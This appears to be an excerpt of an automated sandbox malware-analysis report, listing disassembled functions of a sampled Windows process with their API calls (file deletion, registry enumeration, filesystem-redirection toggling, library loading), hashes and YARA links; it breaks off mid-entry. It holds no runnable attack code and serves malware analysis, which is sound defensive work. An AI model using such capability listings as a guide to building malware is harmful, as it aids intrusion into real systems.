                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                  • String ID: <$@
                                                                                                                                                                                                                                  • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                  • Opcode ID: 21a0ae7a3bd1aca6e0467feb4bb24787d9053737bf12a2b47a0b174130346906
                                                                                                                                                                                                                                  • Instruction ID: 2c16ae91db7284abbe5ce12ebbdfecd6458b9f45339563551ca94f9331e43b6b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21a0ae7a3bd1aca6e0467feb4bb24787d9053737bf12a2b47a0b174130346906
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05714975A00215DFCF14EF98C495A9EBBB5BF48310F048499E855AB252CB75ED82CBA0
                                                                                                                                                                                                                                  Function 009F7B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009F7B6D
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009F7BA3
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009F7BB4
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009F7C36
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                  • String ID: DllGetClassObject
                                                                                                                                                                                                                                  • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                  • Opcode ID: 912bf4a2eb9c2baa2584349c42befe5188daad9e1a09f057f89dc1aecf3c6669
                                                                                                                                                                                                                                  • Instruction ID: b4c59e503424da3998976dadfe5a47a626b3ee96562936d86b733ed56df7714d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 912bf4a2eb9c2baa2584349c42befe5188daad9e1a09f057f89dc1aecf3c6669
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B41A0B1604208EFDB15CFA4D884ABABBB9EF44314F1484A9AE05DF346D7B0DD44CBA0
                                                                                                                                                                                                                                  Function 00A24818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A248D1
                                                                                                                                                                                                                                  • IsMenu.USER32(?), ref: 00A248E6
                                                                                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A2492E
                                                                                                                                                                                                                                  • DrawMenuBar.USER32 ref: 00A24941
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                  • Opcode ID: acf706e207be19234a6d97b6c8f177dccd4038b3549be59df099003529702dc6
                                                                                                                                                                                                                                  • Instruction ID: 294a135689928c7ac67b78b1c79a976c52495721dcd4d20f592c5caefca32a38
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acf706e207be19234a6d97b6c8f177dccd4038b3549be59df099003529702dc6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D414C79A00619EFDB10CF99E884AAA7BB5FF09324F044129FD4597250C770ED95CFA0
                                                                                                                                                                                                                                  Function 009F272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009F27B3
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009F27C6
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 009F27F6
                                                                                                                                                                                                                                    • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                  • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                  • Opcode ID: a3bfbab4f0b8fcd805398cb3287163b78023ff7749e2afb27baf0bd8c0c3178b
                                                                                                                                                                                                                                  • Instruction ID: 131030688c84d0b4e0144a968219285ba0556a9adb2e13bbbba45b616f146a7b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3bfbab4f0b8fcd805398cb3287163b78023ff7749e2afb27baf0bd8c0c3178b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB21E571940108BEDB15ABA8DC46EFF7BBCDF853A0F104529F922A71E1CB38490AD760
                                                                                                                                                                                                                                  Function 00A239B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A23A29
                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00A23A30
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A23A45
                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00A23A4D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                                                                                                                  • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                  • Opcode ID: de9010f8e9a01593ca840acb5467848c801160ac2186ff2a40e6d73744797d5a
                                                                                                                                                                                                                                  • Instruction ID: 8eb52558e351736a243bd54a7f2f87d1f36cab8d6d00f7d84f3949b80638c0aa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de9010f8e9a01593ca840acb5467848c801160ac2186ff2a40e6d73744797d5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4521A472500215AFEF109FA8EC90FBB77A9EB4A3A4F105634FA9196190C776CD819750
                                                                                                                                                                                                                                  Function 009B50DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009B508E,?,?,009B502E,?,00A598D8,0000000C,009B5185,?,00000002), ref: 009B50FD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009B5110
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,009B508E,?,?,009B502E,?,00A598D8,0000000C,009B5185,?,00000002,00000000), ref: 009B5133
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: 8f9c10e6d8ec5946162a24c6571bec79686aa0111688a1150fa1faec7454a608
                                                                                                                                                                                                                                  • Instruction ID: 8f953f5621df1199185844ea5983c69e8ebfaa9b7308f7763ad758aa0b864f57
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f9c10e6d8ec5946162a24c6571bec79686aa0111688a1150fa1faec7454a608
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BF06830900208BBDB21DFD8DD49BEDBFB8EF44762F050164F805A61A0DB759D52CA90
                                                                                                                                                                                                                                  Function 0099663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0099668B,?,?,009962FA,?,00000001,?,?,00000000), ref: 0099664A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0099665C
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,0099668B,?,?,009962FA,?,00000001,?,?,00000000), ref: 0099666E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                  • Opcode ID: d67a477d4fb71f7a4298e8833de9646252fdf8bbc7ea6d9b2bcf5bee230c62e2
                                                                                                                                                                                                                                  • Instruction ID: 1f09e2183a9f5bc94adad67f4f060382dbedb799c9bb705f43c44981974df0b2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d67a477d4fb71f7a4298e8833de9646252fdf8bbc7ea6d9b2bcf5bee230c62e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDE0C236602632679732276DBC0CBBE662CAF82F26B050335FC00E2200DFA0CC0380E4
                                                                                                                                                                                                                                  Function 00996607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,009D5657,?,?,009962FA,?,00000001,?,?,00000000), ref: 00996610
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00996622
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,009D5657,?,?,009962FA,?,00000001,?,?,00000000), ref: 00996635
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                  • Opcode ID: 6546a6ffdd4f18d96c0ecd8e85191a01febe08f8422c4293ddb02a996eb4be46
                                                                                                                                                                                                                                  • Instruction ID: 86390a0922fb6da4edc55447faa465e6eaa08819feccb038cbe88e0d24ef2d24
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6546a6ffdd4f18d96c0ecd8e85191a01febe08f8422c4293ddb02a996eb4be46
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94D02B316025316746326B7C7C08DDF2B18AED5F113050538FC00A6114CF20CC13C1F8
                                                                                                                                                                                                                                  Function 00A03306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A035C4
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00A03646
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A0365C
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A0366D
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A0367F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Delete$Copy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3226157194-0
                                                                                                                                                                                                                                  • Opcode ID: 076e72df9a8f3875b9537a6cd2b6e2ac510ef3d09e4262800d46be45cb2223b7
                                                                                                                                                                                                                                  • Instruction ID: b3a0d0066ac0a478abaa955d5ba0f50ea2a17dbae81fbfb0cd7600f852f2fc4d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 076e72df9a8f3875b9537a6cd2b6e2ac510ef3d09e4262800d46be45cb2223b7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88B15C72A0111DABDF11DBA4DD85FEEBBBDEF49310F0040A6F609A6191EB319B458B60
                                                                                                                                                                                                                                  Function 00A1ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00A1AE87
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A1AE95
                                                                                                                                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A1AEC8
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00A1B09D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3488606520-0
                                                                                                                                                                                                                                  • Opcode ID: db214507fd13341cd5836dfb981c925533c2c8c0d17a0de2bae7c75e40ed84e4
                                                                                                                                                                                                                                  • Instruction ID: 9fe0ff7403596cf242a2a48751648f542e15abeb9bf03a7911fcc0320a678a8f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db214507fd13341cd5836dfb981c925533c2c8c0d17a0de2bae7c75e40ed84e4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66A19171A04301AFE720DF28C886F2AB7E5AF88714F54885DF5999B2D2DB71EC41CB91
                                                                                                                                                                                                                                  Function 00A1C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A1C10E,?,?), ref: 00A1D415
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D451
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4C8
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4FE
                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A1C505
                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A1C560
                                                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A1C5C3
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00A1C606
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A1C613
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 826366716-0
                                                                                                                                                                                                                                  • Opcode ID: ca42f32537811bdeab5a237d05bdb4a141ad540638fa107336d40335c7500432
                                                                                                                                                                                                                                  • Instruction ID: 8f565397edfc071269b1c39c8f7300b100a7db7962b86c268461faf5754ae818
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca42f32537811bdeab5a237d05bdb4a141ad540638fa107336d40335c7500432
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D061A171148241AFD714DF18C894F6ABBE5FF84328F54855CF09A8B2A2DB31ED46CB91
                                                                                                                                                                                                                                  Function 009FED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009FE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009FD7CD,?), ref: 009FE714
                                                                                                                                                                                                                                    • Part of subcall function 009FE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009FD7CD,?), ref: 009FE72D
                                                                                                                                                                                                                                    • Part of subcall function 009FEAB0: GetFileAttributesW.KERNEL32(?,009FD840), ref: 009FEAB1
                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 009FED8A
                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 009FEDC3
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FEF02
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FEF1A
                                                                                                                                                                                                                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 009FEF67
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
